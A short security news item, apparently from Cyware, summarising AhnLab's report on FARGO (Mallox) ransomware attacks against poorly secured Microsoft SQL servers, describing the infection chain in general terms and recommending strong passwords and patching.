A new ransomware attack on misconfigured database management systems has come to the notice of security experts. Multiple vulnerable Microsoft SQL servers are being targeted in attacks by the operators of FARGO ransomware. Disrupting these database management systems can cause severe business troubles.

A similar wave of attacks on database management systems was observed in February, dropping  Cobalt Strike Beacon.

Vulnerable SQL Servers Under Attack

  • Researchers from AhnLab Security Emergency Response Center (ASEC) have reported that Fargo and GlobeImposter ransomware actors are jointly exploiting MS SQL servers to launch attacks.
  • FARGO is a new version of Mallox ransomware that used the .mallox extensions to the files it encrypted.

Infection and Execution Process

  • The researchers note that the ransomware infection starts by compromising Microsoft SQL servers by downloading a .NET file using cmd.exe and powershell.exe.
  • The payload downloads additional malware including the locker, generates and runs a BAT file to terminate specific processes and services.
  • During the infection process, the ransomware excludes some software and directories from encryption to prevent the targeted systems from becoming completely unusable. Some of the exempted software include Tor browser, Internet Explorer, user customizations and settings, the debug log file, and thumbnail database.
  • The locked files are appended with the .Fargo3 extension.
  • Later, the victims of the ransomware attack are threatened with leaking the stolen files unless they pay the ransom.

Recommended Measures

MS-SQL server administrators need to make sure that they use strong and unique passwords. Additionally, keeping the machines up-to-date with the latest fixes for security vulnerabilities is highly advisable.
Cyware Publisher